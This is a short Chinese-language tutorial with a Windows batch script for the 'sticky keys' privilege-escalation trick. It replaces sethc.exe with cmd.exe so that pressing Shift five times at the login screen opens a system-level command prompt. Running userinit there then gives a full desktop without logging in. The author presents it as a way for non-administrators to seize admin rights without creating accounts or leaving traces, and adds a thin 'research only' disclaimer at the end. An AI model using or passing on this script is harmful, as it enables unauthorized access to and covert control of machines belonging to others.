最简单非管理员破解系统管理权限方法

步骤如下：
1.备份sethc.exe
2.复制cmd.exe并改名为sethc.exe后替换system32文件夹下原有sethc.exe
3.到系统登陆界面下按5次Shift，出现命令行窗口（已用非管理员帐户登陆的先logoff）
4.输入 userinit 回车……（关键在此：网上的破解方法都是用net命令添加帐户并提升为管理员组，但这样会创建新用户，并且命令操作太多……新手记不住~~而且想不留痕迹还要删掉创建的帐户，删掉帐户文件夹……这又要很多命令执行~~~）

这样你会发现依然是在登陆界面，但下面出现了任务栏和开始菜单……
点击开始-几乎所有的操作都能做了……而且不会创建帐户，不留痕迹……

脚本：
-----------------------------------------------------------------
rem vista及以后系统要用以下两条命令，去掉以下两条命令的rem即可
rem takeown /f %SystemRoot%\system32\sethc.exe
rem icacls %SystemRoot%\system32\sethc.exe /grant administrators:F
rem xp及以下系统可以直接从这里开始
attrib %SystemRoot%\system32\sethc.exe -s -h -r
rem 去除sethc.exe 特殊属性
ren %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\sethc.exe.bak
rem 备份sethc.exe（网上大多是复制备份再删除源文件，其实直接改名效果是一样的）
copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\sethc.exe
rem 复制cmd为sethc
logoff
rem 注销
----------------------------------------------------------------
执行以上脚本后再在登陆界面按5次Shift,输入userinit回车即可~

声明：本命令脚本只供个人研究使用，不得用于非法目的，因使用本脚本造成任何后果，本人概不负责！